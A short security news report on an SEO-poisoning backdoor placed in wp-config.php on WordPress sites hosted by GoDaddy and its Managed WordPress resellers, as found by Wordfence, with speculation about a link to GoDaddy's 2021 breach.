Experts discovered that multiple WordPress sites using GoDaddy Managed WordPress hosting were infected with the same backdoor. The issue affected major resellers including MediaTemple, tsoHost, 123Reg, Domain Factory, Heart Internet, and Host Europe Managed WordPress.
The problem was noticed by Wordfence analysts on March 11, who report that 298 sites were infected with the backdoor per day, 281 of which were hosted by GoDaddy.
The backdoor itself is an old Google SEO poisoning tool dating back to 2015. It is implanted in wp-config.php, extracts spam link templates from the control server, and then uses them to inject malicious pages into search results.
Most of these templates are related to pharmaceutical spam, and they are shown to visitors to hacked sites instead of the actual content. It seems that in this way the attackers want to force victims to buy fake products, while losing money and leaking their payment details to hackers.
The vector of this massive attack has not yet been determined, but what is happening is very similar to an attack on the supply chain. It is worth remembering that in December 2021 GoDaddy suffered a data breach, which affected 1.2 million of the company’s customers using WordPress. Among them were the Managed WordPress hosting resellers mentioned above. It can be assumed that these incidents are related, and now we are seeing the consequences of last year’s leak.